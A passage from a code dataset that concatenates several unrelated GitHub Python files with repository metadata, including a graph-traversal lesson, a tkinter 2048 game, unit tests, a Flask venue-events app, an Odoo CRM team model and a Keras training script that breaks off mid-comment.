Python.\n\"\"\"\n\nclass DepthGraph:\n def __init__(self, num_nodes, edges, directed=False, weighted=False):\n self.num_nodes = num_nodes\n self.directed = directed\n self.weighted = weighted\n self.data = [[] for _ in range(num_nodes)]\n self.weight = [[] for _ in range(num_nodes)]\n \n for edge in edges:\n if self.weighted:\n # include weights\n node_a, node_b, weight = edge\n # pair the nodes_b with node_a\n self.data[node_a].append(node_b)\n # pair the weight with node_a\n self.weight[node_a].append(weight)\n if not directed:\n self.data[node_b].append(node_a)\n self.weight[node_b].append(weight)\n else:\n # work without weights\n node_a, node_b = edge\n self.data[node_a].append(node_b)\n if not directed:\n self.data[node_b].append(node_a)\n\n def __repr__(self) -> str:\n result = \"\"\n if self.weighted:\n for i, (nodes, weights) in enumerate(zip(self.data, self.weight)):\n result += \"{}:{}\\n\".format(i, list(zip(nodes, weights)))\n else:\n for i, nodes in enumerate(self.data):\n result += \"{}:{}\\n\".format(i, nodes)\n return result\n \n def __str__(self):\n return self.__repr__()\n\n# Graph with weights\n# graph link https://i.imgur.com/wy7ZHRW.png\nnum_nodes = 9\nedges = [(0, 1, 3), (0, 3, 2), (0, 8, 4), (1, 7, 4), (2, 7, 2), (2, 3, 6), \n (2, 5, 1), (3, 4, 1), (4, 8, 8), (5, 6, 8)]\n\nprint(\"Graph with weights:(node,weight)\")\nnew_graph = DepthGraph(num_nodes, edges, weighted=True)\nprint(new_graph)\n\n# Graph with direction\nnum_nodes = 5\nedges = [(0, 1), (1, 2), (2, 3), (2, 4), (4, 2), (3, 0)]\n\nprint(\"Graph with direction:\")\nnew_graph = DepthGraph(num_nodes, edges, directed=True)\nprint(new_graph)\n\nprint(\"\\n---- search in the Depth graph-----\\n\")\ndef depth_first_search(graph, source):\n visited = [False] * len(graph.data)\n # visited node\n stack = [source]\n result = []\n \n # While the stack list is not empty\n while len(stack) > 0:\n # get the current value from stack by poping the last element LIFO \n current = stack.pop()\n # if not visited then visite the node and add in result\n if not visited[current]:\n result.append(current)\n visited[current] = True\n # now we need to 
get the value from grap to populate the stack, \n # think this as a push in LIFO\n for v in graph.data[current]:\n stack.append(v)\n \n return result\n# end of depth_first_search()\n\nsource = 4\nresult = depth_first_search(new_graph, source)\nprint(f\"\\nWe can traverse from {source} to these nodes {result}.\")\n\nprint(\"\\n---------------Graph traversal - shortest path--------------\\n\")\ndef shortest_path(graph, source, target):\n visited = [False] * len(graph.data)\n parent = [None] * len(graph.data)\n # this is the distance of the node we have not discovered yet so its infinity\n distance = [float('inf')] * len(graph.data)\n queue = []\n\n distance[source] = 0\n queue.append(source)\n idx = 0\n\n # Here the target is not visited so we can take the current node from \n # the queue as idx. lets mark the current node as visited (True).\n while idx < len(queue) and not visited[target]:\n current = queue[idx]\n visited[current] = True\n idx += 1\n\n # update the distance of all the neighbours\n update_distances(graph, current, distance, parent)\n\n # find the first unvisited node with smallest distance \n next_node = pick_next_node(distance, visited)\n\n if next_node:\n queue.append(next_node)\n \n return distance[target], parent\n\ndef update_distances(graph, current, distance, parent=None):\n \"\"\"Update the distances of the current node's neighbors\"\"\"\n neighbors = graph.data[current] # from (0, 1, 4), (0,1) are the neighbours\n weights = graph.weight[current] # weight of the edge is 4\n for i, node in enumerate(neighbors):\n weight = weights[i]\n # if the length = distance + weight of the current node is less than the next \n # or adjacent node, update the length to distance of node\n if (distance[current] + weight) < distance[node]:\n distance[node] = distance[current] + weight\n if parent:\n parent[node] = current\n\ndef pick_next_node(distance, visited):\n \"\"\"Pick the next univisited node at the smallest distance\"\"\"\n min_distance = float('inf')\n min_node = None\n for node in range(len(distance)):\n # if visited is false and distance of node is less than infinity \n # return the min_node/next_node\n if not visited[node] and distance[node] < min_distance:\n min_node = node\n # update the min_distance to the discovered node\n min_distance = distance[node]\n return min_node\n\n\nnum_nodes = 6\n# node1, node2, weight of edge\n# graph link https://i.imgur.com/Zn5cUkO.png\nedges = [(0, 1, 4), (0, 2, 2), (1, 2, 5), (1, 3, 10), (2, 4, 3), (4, 3, 4), (3, 5, 11)]\nnew_graph = DepthGraph(num_nodes, edges, weighted=True, directed=True)\n\nprint(\"Graph with weight & direction:\")\nprint(\"Data:\",new_graph.data)\nprint(\"Weight:\",new_graph.weight)\nprint(\"Direction:\",new_graph.directed)\nprint()\n\nsource = 0\ntarget = 5\nshorted_path, visited_nodes = shortest_path(new_graph, source, target)\nprint(f\"The shortest path between {source} & {target} is {shorted_path}.\")\nprint(\"Path follwed was:(Node: Parent)\")\nfor i in range(source, target+1):\n print(f\"{i}:{visited_nodes[i]}\")\n","repo_name":"pranayb-konverge/data-structures-and-algorithms-in-python","sub_path":"lesson_5_graphs_exercise.py","file_name":"lesson_5_graphs_exercise.py","file_ext":"py","file_size_in_byte":12441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39284105625","text":"import tkinter as tk\nimport random\nimport colors as c\n\n\nclass Game(tk.Frame):\n _instance = None\n\n def __init__(self, parent, controller):\n if Game._instance is 
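pick_next_node above rescans every node on each step, making the search O(V^2); a heap-based sketch of the same relaxation loop, assuming the weighted DepthGraph representation above:

import heapq

def dijkstra(graph, source):
    distance = [float('inf')] * len(graph.data)
    distance[source] = 0
    heap = [(0, source)]
    while heap:
        dist, node = heapq.heappop(heap)
        if dist > distance[node]:
            continue  # stale heap entry
        for neighbor, weight in zip(graph.data[node], graph.weight[node]):
            if dist + weight < distance[neighbor]:
                distance[neighbor] = dist + weight
                heapq.heappush(heap, (distance[neighbor], neighbor))
    return distance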
None:\n Game._instance = self\n else:\n raise Exception(\"You cannot create another Game !!!\")\n self.score_undo = []\n self.matrix_undo = []\n tk.Frame.__init__(self, parent)\n self.grid()\n self.master.title('2048')\n\n self.main_grid = tk.Frame(\n self, bg=c.GRID_COLOR, bd=3, width=400, height=400)\n self.main_grid.grid(pady=(90, 20))\n\n button_frame = tk.Frame(self)\n button_frame.place(relx=0.5, y=500, anchor=\"center\")\n button_frame.grid_configure(pady=5)\n\n self.left_button = tk.Button(button_frame, text=\"left\", command=self.left, bg=c.CELL_COLORS[2])\n self.left_button.grid(row=1, column=0)\n self.left_button.grid_configure(padx=10)\n self.left_button.config(height=1, width=5)\n\n self.right_button = tk.Button(button_frame, text=\"right\", command=self.right, bg=c.CELL_COLORS[2])\n self.right_button.grid(row=1, column=4)\n self.right_button.grid_configure(padx=10)\n self.right_button.config(height=1, width=5)\n\n self.up_button = tk.Button(button_frame, text=\"up\", command=self.up, bg=c.CELL_COLORS[2])\n self.up_button.grid(row=0, column=2)\n self.up_button.grid_configure(padx=10)\n self.up_button.config(height=1, width=5)\n\n self.down_button = tk.Button(button_frame, text=\"down\", command=self.down, bg=c.CELL_COLORS[2])\n self.down_button.grid(row=1, column=2)\n self.down_button.grid_configure(padx=10, pady=10)\n self.down_button.config(height=1, width=5)\n\n undo_frame = tk.Frame(self)\n undo_frame.place(x=400, y=50, anchor=\"center\")\n\n self.undo_button = tk.Button(undo_frame, text=\"undo\", command=self.undo, bg=c.CELL_COLORS[2])\n self.undo_button.config(height=1, width=5)\n self.undo_button.grid_configure(padx=10, pady=10)\n\n self.make_GUI()\n self.start_game()\n\n def make_GUI(self):\n # make grid\n self.cells = []\n for i in range(4):\n row = []\n for j in range(4):\n cell_frame = tk.Frame(\n self.main_grid,\n bg=c.EMPTY_CELL_COLOR,\n width=100,\n height=100)\n cell_frame.grid(row=i, column=j, padx=5, pady=5)\n cell_number = tk.Label(self.main_grid, bg=c.EMPTY_CELL_COLOR)\n cell_number.grid(row=i, column=j)\n cell_data = {\"frame\": cell_frame, \"number\": cell_number}\n row.append(cell_data)\n self.cells.append(row)\n\n # make score header\n score_frame = tk.Frame(self)\n score_frame.place(relx=0.5, y=40, anchor=\"center\")\n tk.Label(\n score_frame,\n text=\"Score\",\n font=c.SCORE_LABEL_FONT).grid(\n row=0, column=0)\n self.score_label = tk.Label(score_frame, text=\"0\", font=c.SCORE_FONT)\n self.score_label.grid(row=1)\n\n def start_game(self):\n # create matrix of zeroes\n\n self.matrix = [[0] * 4 for _ in range(4)]\n\n # fill 2 random cells with 2s\n row = random.randint(0, 3)\n col = random.randint(0, 3)\n self.matrix[row][col] = 2\n self.cells[row][col][\"frame\"].configure(bg=c.CELL_COLORS[2])\n self.cells[row][col][\"number\"].configure(\n bg=c.CELL_COLORS[2],\n fg=c.CELL_NUMBER_COLORS[2],\n font=c.CELL_NUMBER_FONTS[2],\n text=\"2\")\n while (self.matrix[row][col] != 0):\n row = random.randint(0, 3)\n col = random.randint(0, 3)\n self.matrix[row][col] = 2\n self.cells[row][col][\"frame\"].configure(bg=c.CELL_COLORS[2])\n self.cells[row][col][\"number\"].configure(\n bg=c.CELL_COLORS[2],\n fg=c.CELL_NUMBER_COLORS[2],\n font=c.CELL_NUMBER_FONTS[2],\n text=\"2\")\n self.score = 0\n self.matrix_undo.append(self.matrix)\n self.score_undo.append(self.score)\n\n # Matrix Manipulation Functions\n\n def stack(self):\n new_matrix = [[0] * 4 for _ in range(4)]\n for i in range(4):\n fill_position = 0\n for j in range(4):\n if self.matrix[i][j] != 0:\n 
new_matrix[i][fill_position] = self.matrix[i][j]\n fill_position += 1\n self.matrix = new_matrix\n\n def combine(self):\n for i in range(4):\n for j in range(3):\n if self.matrix[i][j] != 0 and self.matrix[i][j] == self.matrix[i][j + 1]:\n self.matrix[i][j] *= 2\n self.matrix[i][j + 1] = 0\n self.score += self.matrix[i][j]\n\n def reverse(self):\n new_matrix = []\n for i in range(4):\n new_matrix.append([])\n for j in range(4):\n new_matrix[i].append(self.matrix[i][3 - j])\n self.matrix = new_matrix\n\n def transpose(self):\n new_matrix = [[0] * 4 for _ in range(4)]\n for i in range(4):\n for j in range(4):\n new_matrix[i][j] = self.matrix[j][i]\n self.matrix = new_matrix\n\n # Add a new 2 or 4 tile randomly to an empty cell\n\n def add_new_tile(self):\n row = random.randint(0, 3)\n col = random.randint(0, 3)\n while (self.matrix[row][col] != 0):\n row = random.randint(0, 3)\n col = random.randint(0, 3)\n self.matrix[row][col] = random.choice([2, 4])\n\n # Update the GUI to match the matrix\n\n def update_GUI(self):\n for i in range(4):\n for j in range(4):\n cell_value = self.matrix[i][j]\n if cell_value == 0:\n self.cells[i][j][\"frame\"].configure(bg=c.EMPTY_CELL_COLOR)\n self.cells[i][j][\"number\"].configure(\n bg=c.EMPTY_CELL_COLOR, text=\"\")\n else:\n self.cells[i][j][\"frame\"].configure(\n bg=c.CELL_COLORS[cell_value])\n self.cells[i][j][\"number\"].configure(\n bg=c.CELL_COLORS[cell_value],\n fg=c.CELL_NUMBER_COLORS[cell_value],\n font=c.CELL_NUMBER_FONTS[cell_value],\n text=str(cell_value))\n self.score_label.configure(text=self.score)\n self.update_idletasks()\n\n # Arrow-Press Functions\n\n def left(self):\n self.matrix_undo.append(self.matrix)\n self.score_undo.append(self.score)\n self.stack()\n self.combine()\n self.stack()\n self.add_new_tile()\n self.update_GUI()\n self.game_over()\n\n def right(self):\n self.matrix_undo.append(self.matrix)\n self.score_undo.append(self.score)\n self.reverse()\n self.stack()\n self.combine()\n self.stack()\n self.reverse()\n self.add_new_tile()\n self.update_GUI()\n self.game_over()\n\n def up(self):\n self.matrix_undo.append(self.matrix)\n self.score_undo.append(self.score)\n self.transpose()\n self.stack()\n self.combine()\n self.stack()\n self.transpose()\n self.add_new_tile()\n self.update_GUI()\n self.game_over()\n\n def down(self):\n self.matrix_undo.append(self.matrix)\n self.score_undo.append(self.score)\n self.transpose()\n self.reverse()\n self.stack()\n self.combine()\n self.stack()\n self.reverse()\n self.transpose()\n self.add_new_tile()\n self.update_GUI()\n self.game_over()\n\n def undo(self):\n if len(self.matrix_undo) > 1:\n self.score = self.score_undo.pop()\n self.matrix = self.matrix_undo.pop()\n self.update_GUI()\n self.game_over()\n\n # Check if any moves are possible\n\n def horizontal_move_exists(self):\n for i in range(4):\n for j in range(3):\n if self.matrix[i][j] == self.matrix[i][j + 1]:\n return True\n return False\n\n def vertical_move_exists(self):\n for i in range(3):\n for j in range(4):\n if self.matrix[i][j] == self.matrix[i + 1][j]:\n return True\n return False\n\n # Check if Game is Over (Win/Lose)\n\n def game_over(self):\n if any(2048 in row for row in self.matrix):\n game_over_frame = tk.Frame(self.main_grid, borderwidth=2)\n game_over_frame.place(relx=0.5, rely=0.5, anchor=\"center\")\n tk.Label(\n game_over_frame,\n text=\"You win!\",\n bg=c.WINNER_BG,\n fg=c.GAME_OVER_FONT_COLOR,\n font=c.GAME_OVER_FONT).pack()\n elif not any(0 in row for row in\n self.matrix) and not 
self.horizontal_move_exists() and not self.vertical_move_exists():\n game_over_frame = tk.Frame(self.main_grid, borderwidth=2)\n game_over_frame.place(relx=0.5, rely=0.5, anchor=\"center\")\n tk.Label(\n game_over_frame,\n text=\"Game over!\",\n bg=c.LOSER_BG,\n fg=c.GAME_OVER_FONT_COLOR,\n font=c.GAME_OVER_FONT).pack()\n","repo_name":"AvivHitman/2048","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":9459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"69853745852","text":"from battle_city.monsters.monster import Monster\nfrom battle_city.basic import Direction\n\nimport pytest\n\ndef make_monster(x=128, y=128):\n return Monster(x, y)\n\n\ndef test_set_position():\n monster = make_monster()\n monster.set_position(32, 32)\n\n assert monster.position.x == 32\n assert monster.position.y == 32\n\n\ndef test_set_old_position():\n monster = make_monster()\n monster.set_position(32, 32)\n monster.set_old_position()\n\n assert monster.old_position.x == 32\n assert monster.old_position.y == 32\n\n\ndef test_set_speed():\n monster = make_monster()\n monster.set_speed(10)\n assert monster.speed == 10\n\n\ndef test_set_direction():\n monster = make_monster()\n monster.set_direction(Direction.UP)\n\n assert monster.direction == Direction.UP\n\n\ndef test_get_type():\n monster = make_monster()\n\n assert monster.get_type() == 'monster'\n\n\n@pytest.mark.parametrize('direction, dx, dy', [\n (Direction.UP, 0, -10),\n (Direction.DOWN, 0, 10),\n (Direction.LEFT, -10, 0),\n (Direction.RIGHT, 10, 0),\n])\ndef test_move_with_speed_up(direction, dx, dy):\n monster = make_monster(x=128, y=128)\n monster.set_direction(direction)\n monster.move_with_speed(10)\n\n assert monster.position.x == 128 + dx\n assert monster.position.y == 128 + dy\n\n\ndef move_if_is_freeze():\n monster = make_monster(x=128, y=128)\n monster.set_direction(Direction.UP)\n monster.set_freeze()\n monster.move()\n\n assert monster.position.x == 128\n assert monster.position.y == 128\n\n\ndef move_if_is_not_freeze():\n monster = make_monster(x=128, y=128)\n monster.set_speed(10)\n monster.set_direction(Direction.UP)\n monster.move()\n\n assert monster.position.x == 128\n assert monster.position.y == 118\n","repo_name":"firemark/battle-city-ai","sub_path":"tests/monsters/test_monster.py","file_name":"test_monster.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"78"} +{"seq_id":"7638900021","text":"import sys\nimport math\n\ndef ord(n):\n n = int(n)\n if 11 <= (n % 100) <= 13:\n suffix = 'th'\n else:\n suffix = ['th', 'st', 'nd', 'rd', 'th'][min(n % 10, 4)]\n return str(n) + suffix\n\nprint(ord(int(input())))\n\n# 1 --> 1st // 2---> 2nd\n","repo_name":"MarouaneBouf/CodeClashes","sub_path":"OrdinalNumber.py","file_name":"OrdinalNumber.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"28783744556","text":"from flask import Flask\r\nfrom flask import render_template\r\nimport contentscrape\r\nfrom contentscrape import dt, start, end\r\nfrom datetime import datetime, timedelta, date\r\n\r\napp = Flask(__name__,\r\n template_folder=\"templates\",\r\n static_folder=\"static\")\r\n\r\nevents = {\r\n \"Gaillard\": contentscrape.Gaillard(),\r\n \"Home Team Downtown\": contentscrape.HomeTeamDowntown(),\r\n \"Home Team West Ashley\": contentscrape.HomeTeamWA(),\r\n \"Music 
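One fragility in the 2048 Game class above: add_new_tile keeps drawing random cells until it finds an empty one, which loops forever on a full board (the second placement in start_game has the same pattern). A guarded sketch:

def add_new_tile_safe(matrix):
    # collect the empty cells first, then pick one (no retry loop)
    empty = [(i, j) for i in range(4) for j in range(4) if matrix[i][j] == 0]
    if empty:
        row, col = random.choice(empty)
        matrix[row][col] = random.choice([2, 4])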
Farm Charleston\": contentscrape.MusicFarm(),\r\n \"Music Hall\": contentscrape.MusicHall(),\r\n \"Pour House\": contentscrape.PourHouse(),\r\n \"Royal American\": contentscrape.RoyalAmerican(),\r\n \"Sparrow\": contentscrape.Sparrow(),\r\n \"Theatre 99\": contentscrape.Theatre99(),\r\n \"Tin Roof\": contentscrape.TinRoof(),\r\n \"Wind Jammer\": contentscrape.WindJammer(),\r\n \"Woolfe Street\": contentscrape.WoolfeStreet()\r\n }\r\n\r\n# Get today's date\r\ndate_today = date.today().strftime(\"%A, %B %#d, %Y\")\r\n# Get list of days of the week\r\ndates = [dt.strftime(\"%A, %B %#d, %Y\") for dt in contentscrape.daterange(start, end)]\r\n\r\n\r\n@app.route('/', methods=['GET'])\r\n@app.route('/home', methods=['GET'])\r\ndef hello_world():\r\n return render_template('home.html', date_today=date_today,\r\n date_week=dates[0] + \" - \" + dates[-1],\r\n results=events, page='Home')\r\n\r\n\r\n@app.route('/about', methods=['GET'])\r\ndef about():\r\n return render_template('about.html', venues=contentscrape.venuesAbout, page='About')\r\n\r\n\r\n@app.route('/contact', methods=['GET'])\r\ndef contact():\r\n return render_template('contact.html', page='Contact')\r\n\r\n\r\napp.config['TEMPLATES_AUTO_RELOAD'] = True\r\n# app.config['TESTING'] = True\r\n\r\nif __name__ == '__main__':\r\n app.run(host='127.0.0.1', port=5000)\r\n","repo_name":"rybli/chs-tonight-2.0","sub_path":"hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":1838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"72979588412","text":"import sys\nimport os\nimport pandas as pd\nimport numpy as np\nfrom itertools import chain\n\n\nsys.path.append('../src')\nsys.path.append('../tests')\nimport data_helper\n\n\nclass TestAmazonKerasClassifier:\n \"\"\"\n Use with pytest -q -s amazon_keras_classifier_tests.py\n Checks that the preprocessed data have the right shape\n \"\"\"\n def test_data_preprocess(self):\n img_resize = (16, 16)\n color_channels = 3 # RGB\n train_jpeg_dir, test_jpeg_dir, test_jpeg_additional, train_csv_file = data_helper.get_jpeg_data_files_paths()\n\n assert os.path.exists(train_jpeg_dir), \"The {} folder does not exist\".format(train_jpeg_dir)\n assert os.path.exists(test_jpeg_dir), \"The {} folder does not exist\".format(test_jpeg_dir)\n assert os.path.exists(test_jpeg_additional), \"The {} file does not exist\".format(test_jpeg_additional)\n assert os.path.exists(train_csv_file), \"The {} file does not exist\".format(train_csv_file)\n\n x_train, y_train, y_map = data_helper.preprocess_train_data(train_jpeg_dir, train_csv_file,\n img_resize=img_resize)\n\n x_test, _ = data_helper.preprocess_test_data(test_jpeg_dir, img_resize=img_resize)\n x_test_add, _ = data_helper.preprocess_test_data(test_jpeg_additional, img_resize=img_resize)\n\n labels_df = pd.read_csv(train_csv_file)\n labels_count = len(set(chain.from_iterable([tags.split(\" \") for tags in labels_df['tags'].values])))\n train_files_count = len(os.listdir(train_jpeg_dir))\n test_files_count = len(os.listdir(test_jpeg_dir))\n test_add_file_count = len(os.listdir(test_jpeg_additional))\n assert x_train.shape == (train_files_count, *img_resize, color_channels)\n assert x_test.shape == (test_files_count, *img_resize, color_channels)\n assert x_test_add.shape == (test_add_file_count, *img_resize, color_channels)\n assert y_train.shape == (train_files_count, 
labels_count)\n","repo_name":"EKami/planet-amazon-deforestation","sub_path":"tests/amazon_keras_classifier_tests.py","file_name":"amazon_keras_classifier_tests.py","file_ext":"py","file_size_in_byte":2003,"program_lang":"python","lang":"en","doc_type":"code","stars":122,"dataset":"github-code","pt":"78"} +{"seq_id":"74600257532","text":"import numpy as np\nimport math, sys, random\n\ndef inner_x_w(x, num_vars, bit_eqns, gamma):\n total_phase = 1 # skip the 1/sqrt(2^n), we cancel it later\n # for each equation, calculate overlap\n for i in range(len(bit_eqns)):\n total_phase *= math.e**(-complex(0,1)*gamma*0.5*((-1)**(bit_eqns[i][1] + num_ones(x & bit_eqns[i][0]))))\n return total_phase\n\ndef convert_to_bin(num_vars, eqn_set):\n n = num_vars - 1\n bit_eqns = []\n for eqn in eqn_set:\n y = 0\n for j in range(3):\n y += 2**(n - eqn[j])\n bit_eqns.append([y, eqn[3]])\n return bit_eqns\n\ndef num_ones(n):\n count = 0\n while (n):\n count += n & 1\n n >>= 1\n return count\n\ndef e3lin2_exact(i, eqns_location, gamma):\n all_eqns = []\n f = open(eqns_location, \"r\")\n line = f.readline()\n while line:\n all_eqns.append(list(map(int, line.split(\",\"))))\n line = f.readline()\n\n base_eqn = all_eqns[i]\n qubits = set()\n for j in range(len(all_eqns)):\n qubits |= set(all_eqns[j][:-1])\n num_vars = len(qubits)\n bit_eqns = convert_to_bin(num_vars, all_eqns)\n ys = bit_eqns[i][0]\n\n total = 0\n done_samples = 0\n # 10**5 samples = 33 seconds\n # num_samples = (10**5) * len(all_eqns)**2\n # num_samples = 5.4 * 10**7 # takes 5 hours\n num_samples = 6*10**6\n while done_samples < num_samples:\n done_samples += 1\n if done_samples % 10**4 == 0:\n print(done_samples)\n sys.stdout.flush()\n x = random.randint(0, 2**(num_vars)-1)\n alpha = -complex(0,1)*((-1)**(num_ones(x & ys)))\n row_index = x ^ ys\n inner1 = np.conj(inner_x_w(row_index, num_vars, bit_eqns, gamma))\n inner2 = inner_x_w(x, num_vars, bit_eqns, gamma)\n total += inner1*inner2*alpha\n total /= num_samples\n\n '''\n # exact calculation, sum over basis states instead of sampling\n total = 0\n for i in range(2**num_vars):\n alpha = -complex(0,1)*((-1)**(num_ones(i & ys)))\n row_index = i ^ ys\n inner1 = np.conj(inner_x_w(row_index, num_vars, bit_eqns, gamma))\n inner2 = inner_x_w(i, num_vars, bit_eqns, gamma)\n total += 2**num_vars*inner1*inner2*alpha\n\n total /= 2**num_vars\n #total *= (-1)**base_eqn[3] why don't we need this?\n '''\n\n # error calculation\n delta = 0.001\n eps = math.sqrt(2*math.log(2/delta)/num_samples)\n error = eps*len(all_eqns)/2\n\n return np.real(total), error\n\nif __name__ == '__main__':\n if(len(sys.argv) != 4):\n print('Please specify , , ')\n else:\n eqn_number = int(sys.argv[1])\n eqns_location = sys.argv[2]\n gamma = float(sys.argv[3])\n\n estimate, error = e3lin2_exact(eqn_number, eqns_location, gamma)\n print(float(estimate))\n print(error)\n","repo_name":"cook-jeremy/paulishuffle-e3lin2","sub_path":"exact.py","file_name":"exact.py","file_ext":"py","file_size_in_byte":2837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"75073344571","text":"import pandas as pd\r\n\r\ndataset = pd.read_csv('Female_Stats.csv')\r\n\r\nfeatures = dataset.iloc[:,1:]\r\nlabels = dataset.iloc[:,0]\r\n\r\nimport statsmodels.api as sm\r\nfeatures = sm.add_constant(features)\r\n\r\nfeatures_opt = features[:]\r\nregressor_OLS = sm.OLS(endog = labels, exog = 
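For reference, the bit-counting loop in num_ones above can be expressed with Python built-ins (same result):

def num_ones_fast(n):
    return bin(n).count('1')  # or n.bit_count() on Python 3.10+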
features_opt).fit()\r\nregressor_OLS.summary()\r\n\r\n#print(regressor_OLS.params[1])\r\n#print(regressor_OLS.params[2])\r\n\r\nx = labels[0].mean()\r\n\r\n#for inc in mother's height\r\n\r\nfeatures_opt = features.momheight + 1\r\nfeatures_opt = features_opt.to_frame()\r\n\r\n# Fitting Linear Regression to the dataset\r\nfrom sklearn.linear_model import LinearRegression\r\nlin_reg_1 = LinearRegression()\r\nlin_reg_1.fit(features_opt, labels)\r\n\r\nlst1=[]\r\nfor item in labels:\r\n y = lin_reg_1.predict(item)\r\n lst1.append(y)\r\n \r\ndf = pd.DataFrame(lst1)\r\nz=df[0].mean()\r\ndiff = z-x\r\nprint(\"For Mom height inc by 1 : \" + str(diff))\r\n\r\n#for inc in Father's height\r\n\r\nfeatures_opt = features.dadheight + 1\r\nfeatures_opt = features_opt.to_frame()\r\n\r\n# Fitting Linear Regression to the dataset\r\nfrom sklearn.linear_model import LinearRegression\r\nlin_reg_1 = LinearRegression()\r\nlin_reg_1.fit(features_opt, labels)\r\n\r\nlst1=[]\r\nfor item in labels:\r\n y = lin_reg_1.predict(item)\r\n lst1.append(y)\r\n \r\ndf = pd.DataFrame(lst1)\r\nz=df[0].mean()\r\ndiff = z-x\r\nprint(\"For Dad height inc by 1 : \" + str(diff))\r\n","repo_name":"anubhavsrivastava10/Python-ML","sub_path":"DAY 17/Female_Stats.py","file_name":"Female_Stats.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42158139412","text":"from dateutil.relativedelta import relativedelta\n\nfrom odoo import api, fields, models, _\nfrom odoo.tools.safe_eval import safe_eval\nfrom odoo.exceptions import ValidationError\n\n\nclass CrmTeam(models.Model):\n _inherit = 'crm.team'\n _description = 'Sales Team'\n\n\n correos = fields.Char( string='Correos' )\n miembros = fields.Many2many('res.users', string='Miembros del Equipo' )\n surcursal_id = fields.Many2one('surcursal', string='Surcursal')\n\n rol = fields.Selection([('comercial', 'Comercial'), \n ('delegado', 'Delegado'),('postventa','Post-Venta')\n ],string='Rol', default='comercial') \n\n \n @api.model\n @api.returns('self', lambda value: value.id if value else False)\n def _get_default_team_id(self, user_id=None, domain=None):\n if not user_id:\n user_id = self.env.uid\n team_id = self.env['crm.team'].search([\n '|', ('user_id', '=', user_id), ('miembros', '=', user_id),\n '|', ('company_id', '=', False), ('company_id', '=', self.env.company.id)\n ], limit=1)\n if not team_id and 'default_team_id' in self.env.context:\n team_id = self.env['crm.team'].browse(self.env.context.get('default_team_id'))\n if not team_id:\n team_domain = domain or []\n default_team_id = self.env['crm.team'].search(team_domain, limit=1)\n return default_team_id or self.env['crm.team']\n return team_id\n\n\n\n @api.onchange(\"miembros\")\n def actualizar_correos_team(self,):\n correos=self.miembros.mapped('email')\n correoCadena=\"\"\n for correo in correos:\n if correo:\n correoCadena=correoCadena+correo+','\n correoCadena=correoCadena.strip(',')\n self.correos=correoCadena\n\n\n\n @api.model\n def create(self, values):\n team = super(CrmTeam, self.with_context(mail_create_nosubscribe=True)).create(values)\n if values.get('miembros'):\n team._add_members_to_favorites()\n return team\n\n def write(self, values):\n res = super(CrmTeam, self).write(values)\n if values.get('miembros'):\n self._add_members_to_favorites()\n return res\n\n def unlink(self):\n default_teams = [\n self.env.ref('sales_team.salesteam_website_sales'),\n self.env.ref('sales_team.pos_sales_team'),\n 
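A caveat for the regression loops in the stats script above: scikit-learn's predict expects a 2-D array, so lin_reg_1.predict(item) with a bare scalar fails on current versions. A hedged sketch of the shape-safe call:

y = lin_reg_1.predict([[item]])  # one sample with one feature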
self.env.ref('sales_team.ebay_sales_team')\n        ]\n        from odoo.exceptions import UserError  # local import: the module header only imports ValidationError\n        for team in self:\n            if team in default_teams:\n                raise UserError(_('Cannot delete default team \"%s\"' % (team.name)))\n        return super(CrmTeam,self).unlink()\n\n    def _add_members_to_favorites(self):\n        for team in self:\n            team.favorite_user_ids = [(4, member.id) for member in team.miembros]\n","repo_name":"aigiler/promoautoecuador","sub_path":"gzl_crm/models/crm_team.py","file_name":"crm_team.py","file_ext":"py","file_size_in_byte":2824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
+{"seq_id":"70216747774","text":"#-*- coding: UTF-8 -*-\r\n# based on tensorflow==1.2.0 keras==2.0.6\r\n# Also install h5py, opencv-python\r\nimport os\r\n# Run on CPU\r\n# os.environ[\"CUDA_VISIBLE_DEVICES\"]=\"-1\"\r\n'''ZZH 2022.04.20\r\n    1. Changed the network structure to mobilenetv1'''\r\n'''ZZH 2022.04.28\r\n    Pruned the network model to cut the parameter count -- successful.\r\n    About 12000 parameters in total; conv-layer parameters reduced to 1/5 of the original.\r\n    Built on top of the earlier CNN network.'''\r\n'''ZZH 2022.04.28\r\n    Tried replacing the fully connected layer with a conv layer, reducing the parameters to 4958'''\r\n\r\n\r\n\r\nimport tensorflow as tf\r\nimport keras\r\nfrom keras import layers\r\nimport matplotlib.pyplot as plt\r\nfrom keras.models import Model, Sequential\r\nfrom keras.layers import Input, Dense, Activation, Flatten\r\nfrom keras.callbacks import ModelCheckpoint\r\nfrom keras import optimizers\r\nimport numpy as np\r\nimport cv2\r\nimport random\r\n# from sklearn.metrics import roc_curve, auc\r\n\r\n# Solve \"Function call stack:train_function\"\r\n# tf.compat.v1.disable_eager_execution()\r\n\r\n# Allocate GPU memory on demand\r\nos.environ['CUDA_VISIBLE_DEVICES'] = '0'\r\nconfig = tf.compat.v1.ConfigProto()\r\nconfig.gpu_options.allow_growth = True\r\nsession = tf.compat.v1.InteractiveSession(config=config)\r\n\r\n\r\nBATCH_SIZE = 64\r\nepochs = 8\r\nImage_resize = (99, 99)\r\nInput_shape = (99, 99, 3) # required input size\r\nDropoutrate = 0.5\r\n\r\n\r\n\r\n'''def conv_block(input_tensor, filters, alpha, kernel_size=(9,9), strides=(1,1)):\r\n    \r\n    # the hyperparameter alpha scales the number of conv kernels\r\n    filters = int(filters*alpha)\r\n    \r\n    # convolution + batch normalization + activation\r\n    x = layers.Conv2D(filters, kernel_size, \r\n                      strides=strides, # stride\r\n                      padding='same', # zero padding keeps the feature-map size after the conv\r\n                      use_bias=False)(input_tensor) # no bias needed when a BN layer follows\r\n  